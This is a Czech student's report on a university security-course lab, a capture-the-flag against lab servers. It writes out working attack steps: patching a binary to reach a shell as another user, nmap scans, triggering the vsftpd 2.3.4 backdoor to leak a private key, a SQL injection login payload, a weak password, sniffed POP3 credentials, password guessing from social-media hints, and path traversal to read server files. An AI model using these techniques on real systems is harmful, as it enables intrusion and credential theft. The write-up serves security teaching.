VUT Brno – Fakulta informaˇcn´ıch technologi´ı Bezpeˇcnost informaˇcn´ıch syst´em˚ u (BIS) – 2015/2016 Projekt 1 – Mystery of BIS Frantiˇsek Nˇemec (
[email protected]) 2. prosince 2015
1
Smithovo tajemstv´ı (A)
Pˇrihl´ as´ım se pˇres ssh s priv´ atn´ım kl´ıˇcem. [stud@xnemec61 ~]$ cd .. [stud@xnemec61 ~]$ ls smith stud Dalˇs´ı uˇzivatel smith“, ten bude d˚ uleˇzit´ y. Co ta bin´arka zsnes. ” [stud@xnemec61 ~]$ strings zsnes ... I’m only a dummy for BIS project... (naznaˇ cuje, ˇ ze soubor bude d˚ uleˇ zit´ y) su - smith (zase smith, to je n´ ahoda a dokonce su) ... Dekompiluji k´ od pomoc´ı Boomerang1 . V jedn´e vˇetvi je vol´an´ı system(), tak ho zkus´ım vyvolat. ... } else { system(); eax = 0; } } else { ... Zkus´ım to pustit pˇres debugger. Nejprve z objdump zjist´ım na jakou adresu skoˇcit. $ objdump ... 804869f: 80486a1: 80486a8: 80486ad: ...
-d zsnes 74 c7 e8 b8
13 04 24 8b 8a 04 08 0b fd ff ff 00 00 00 00
je movl call mov
80486b4 <main+0x1e0> $0x8048a8b,(%esp) 80483b8 <system@plt> $0x0,%eax
$ gdb zsnes $(gdb) break main $(gdb) run $(gdb) set $pc = 0x80486a1 $(gdb) n su: uˇ zivatel smith neexistuje 1 http://boomerang.sourceforge.net/
1
Dobr´ y, ale budu muset upravit bin´ arku a tu spustit pˇr´ımo na serveru. Z objdumpu zjist´ım, kde v bin´ arce zaˇc´ın´ a main a kde se nach´ az´ı volan´ı system(). Vˇsechno od zaˇc´atku po movl pˇred volan´ım system() pˇreskoˇc´ım (vloˇzen´ım NOP˚ u). Zkop´ıruji upravenou bin´ arku na server a spust´ım. Jsem pˇrihl´aˇsen jako smith s prvn´ım tajemstv´ım a pˇr´ıstupu k nmap. Pozdˇeji jsem zjistil, ˇze staˇc´ı pouˇz´ıt su - smith a sloˇzit´ y postup uveden´ y v´ yˇse byl zbyteˇcn´ y. [smith@xnemec61 ~]$ ls sectet.txt nmap [smith@xnemec61 ~]$ cat secret.txt Ziskali jste tajemstvi "A:17:11:02:00:01:0cd279c7d8...
2
Mapov´ an´ı s´ıtˇ e (NMap)
Zjiˇstˇen´ı adresy s´ıtˇe: [smith@xnemec61 ~]$ ifconfig ... inet addr:192.168.122.205 Bcast:192.168.122.255 ...
Mask:255.255.255.0
Mapov´ an´ı s´ıtˇe: [smith@xnemec61 ~]$ sudo nmap -sP 192.168.122.0/24 Pˇr´ıliˇs mnoho v´ ypis˚ u s pˇripojen´ ymi uˇzivateli. Zaj´ımavˇe vypadaj´ı v´ ypisy s ptest. [smith@xnemec61 ~]$ sudo nmap -sP Nmap scan report for ptest3.local Nmap scan report for ptest1.local Nmap scan report for ptest2.local Nmap scan report for ptest4.local
192.168.122.0/24 | grep ptest (192.168.122.50) (192.168.122.54) (192.168.122.98) (192.168.122.230)
Mapov´ an´ı sluˇzeb jednotliv´ ych server˚ u: [smith@xnemec61 ~]$ sudo nmap -sS -sV 192.168.122.50 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 80/tcp open http Apache httpd 2.2.15 ((CentOS)) [smith@xnemec61 ~]$ sudo nmap -sS -sV 192.168.122.54 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 80/tcp open http Apache httpd 2.2.15 ((CentOS)) 3306/tcp open mysql MySQL (unauthorized) [smith@xnemec61 22/tcp open 110/tcp open 55555/tcp open
~]$ sudo nmap -sS -sV 192.168.122.98 ssh OpenSSH 5.3 (protocol 2.0) pop3 Dovecot pop3d http Apache httpd
[smith@xnemec61 ~]$ sudo nmap -sS -sV 192.168.122.230 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 80/tcp open http Apache httpd 2.2.15 ((CentOS))
2
3
FTP backdoor (B)
Server ptest1 provozuje ftp s backdoorem2 . Pˇripojen´ı pˇres telnet: [smith@xnemec61 ~]$ telnet 192.168.122.54 21 Trying 192.168.122.54... Connected to 192.168.122.54. Escape character is ’^]’. 220 (vsFTPd 2.3.4) USER x:) 331 Please specify the password. PASS 220 Opened port 58874, take a look ;) telnet 192.168.122.54 58874 Trying 192.168.122.54... Connected to 192.168.122.54. Escape character is ’^]’. -----BEGIN RSA PRIVATE KEY----MIIEpAIBAAKCAQEAxXRaP2hoSg1twOly6p7VMILraMxWNEjj6ZS17gOZysyy42OI bWXhkAMUwh+IkMSsRNKQm3MSsObrMELRq2P1afiQ8pNfFIHKa9LQ2h+NjwaLLbz6 ... EBbW8ACoREMr4QxLFqRzHFCdady/nrmIxZIfiZ7mkA3K5IvApWIhs43SHzMhFAEI ZUuvciHkkGYlNckBUbTA6+ox9ThSNlwb+ILrF7DGJelE4GjfdMkDFQ== -----END RSA PRIVATE KEY----500 OOPS: Bye Bye. Connection closed by foreign host. Priv´ atn´ı kl´ıˇc pouˇziji k ssh pˇripojen´ı k nˇejak´emu serveru... ptest1 funguje: [stud@xnemec61 ~]$ ssh -4 -i id_rsa_54 smith@ptest1 Welcome smith! Last login: Tue Nov 24 12:36:56 2015 from xsarca00.local [smith@ptest1 ~]$ ls file.pcap secret.txt tcpdump telnet [smith@ptest1 ~]$ cat secret.txt Ziskali jste tajemstvi "B:24:11:12:57:01:376a6bcb68..."
4
SQL injection (C)
Pˇripojen´ı k http serveru ptest1: [stud@xnemec61 ~] elinks http://ptest1 Pouˇzit´ı loginu
[email protected] a hesla ’ OR ’1’=’1: Ziskali jste tajemstvi "C:24:11:14:37:01: 1355934b75..."
5
Slab´ e heslo (D)
Pˇripojen´ı k http serveru ptest2 (tentokr´ at na nestandardn´ı port). [stud@xnemec61 ~]$ elinks http://ptest2:55555 Pouˇz´ıt´ı loginu admin a hesla 123456. Ziskali jste tajemstvi "D:24:11:17:09:01: 62e18d7bb2..." 2 https://xorl.wordpress.com/2011/07/05/vsftpd-2-3-4-backdoor/
3
6
Odchycen´ı POP3 pˇ rihlaˇ sovac´ıch u ´ daj˚ u (E)
Anal´ yza POP3 paket˚ u co bˇehaj´ı po s´ıt´ı: [smith@ptest1 ~]$ sudo tcpdump -X port pop3 ... 18:17:43.854819 IP ptest1.local.39432 > ptest2.local.pop3: Flags [P.], seq 7:19, ... 0x0000: 4500 0040 2ed0 4000 4006 95fe c0a8 7a36 E..@..@
[email protected] 0x0010: c0a8 7a62 9a08 006e 0694 b99d a7e1 91d2 ..zb...n........ 0x0020: 8018 0391 3633 0000 0101 080a 6dd3 9769 ....63......m..i 0x0030: 6dba 15b3 5553 4552 2073 6d69 7468 0d0a m...USER.smith.. ... 18:17:43.855384 IP ptest1.local.39432 > ptest2.local.pop3: Flags [P.], seq 19:34, ... 0x0000: 4500 0043 2ed1 4000 4006 95fa c0a8 7a36 E..C..@
[email protected] 0x0010: c0a8 7a62 9a08 006e 0694 b9a9 a7e1 91d7 ..zb...n........ 0x0020: 8018 0391 c9f2 0000 0101 080a 6dd3 976a ............m..j 0x0030: 6dba 15b4 5041 5353 2071 4277 5a48 7a4c m...PASS.qBwZHzL 0x0040: 310d 0a 1.. ... Pˇripojen´ı k POP3 serveru s odchytnut´ ym loginem a heslem (v emailu se nach´az´ı tajemstv´ı E): [stud@xnemec61 ~]$ telnet ptest2 pop3 Trying 192.168.122.98... Connected to ptest2. Escape character is ’^]’. +OK Dovecot ready. USER smith +OK PASS qBwZHzL1 +OK Logged in. LIST +OK 1 messages: 1 505 . RETR 1 +OK 505 octets Return-Path:
X-Original-To: smith@localhost Delivered-To: [email protected] Received: by BIS-ptest2.bis.com (Postfix, from userid 0) id 433495C10; Tue, 3 Nov 2015 20:43:11 +0100 (CET) Message-Id: <[email protected]> Date: Tue, 3 Nov 2015 20:43:11 +0100 (CET) From: [email protected] (root) To: undisclosed-recipients:; Ziskali jste tajemstvi "E:03:11:20:43:01:d4fbac02b5..." .
7
Soci´ aln´ı s´ıt’ (F)
Pˇripojen´ı k ptest3 http serveru: [stud@xnemec61 ~]$ elinks http://ptest3 Jeden z doktorand˚ u napsal zaj´ımav´ y ˇcl´anek: Maroˇ s Barabas @ibarabas Zaj´ ımavost z hackingu: V´ ıte kolik informac´ ı se d´ a zjistit o lidech na jejich soci´ aln´ ıch s´ ıt´ ıch? Lid´ e mnohokr´ at nap´ ıˇ sou i sv´ a hesla. :) 4
Zkus´ım naj´ıt doktorandy na facebooku. ”Maros Barabas”3 m´a nˇeco uˇziteˇcn´eho: Ak hladate nejake info, skuste @fitbis. Ak tomu nerozumiete, nekomentujte. Dakujem. Pouˇzit´ı @ pˇred fitbis ukazuje na Twitter4 . Ak ste sa dostali az sem, tak asi hladate nejake info: Vlam sa Abdulah, mam hnede oci, 126cm (v obvode) a moj pes sa vola Charlie. Zkus´ım se pˇripojit jako nˇekter´ y z doktorand˚ u. Uˇzivatel ibarabas poskytl n´apovˇedu hesla. Invalid password! Hint: Jmeno meho psa Vstup do s´ıtˇe doktorand˚ u s loginem ibarabas a heslem charlie: Ziskali jste tajemstvi "F:28:11:13:40:01: f3706520fb..."
8
Path traversal (G)
Pˇripojen´ı na ptest4 http server: [stud@xnemec61 ~] elinks http://ptest4 http://192.168.122.230/index.php?dir=/home/data/web/shared Vstup do home adres´ aˇre serveru (pˇres elinks): http://192.168.122.230/index.php?dir=/home/ data martin pavel radek V Radkovˇe sloˇzce se nach´ az´ı tajemstv´ı http://192.168.122.230/index.php?dir=/home/radek/secret.txt Ziskali jste tajemstvi "G:24:11:18:52:01:9739dafa6f..."
9
PDF metadata (I)
V Pavlovˇe sloˇzce se nach´ az´ı zaj´ımav´ y email spolu s pdf dokumentem: http://192.168.122.230/index.php?file=/home/pavel/1445685669.Vfd00I5a3fM694032.unknown:2,S ... Ahoj, dokoncil jsem ten dokument. Posilam ti ho v priloze. V textu neni zadna informace, ktera by vedla k tomu, ze jsem to psal ja, tak jak jsme se domluvili. Pro jistotu to ale zkontroluj. Samotn´ y obsah pdf dokumentu nen´ı zaj´ımav´ y, ale metadata uˇz jsou zaj´ımavˇejˇs´ı zejm´ena kl´ıˇcov´a slova. http://192.168.122.230/index.php?file=/home/pavel/Document.pdf ... /Keywords(Ziskali jste tajemstvi "I:03:11:13:13:35:a283eae6d3...") ...
3 https://www.facebook.com/mbarabas 4 http://www.twitter.com/fitbis
5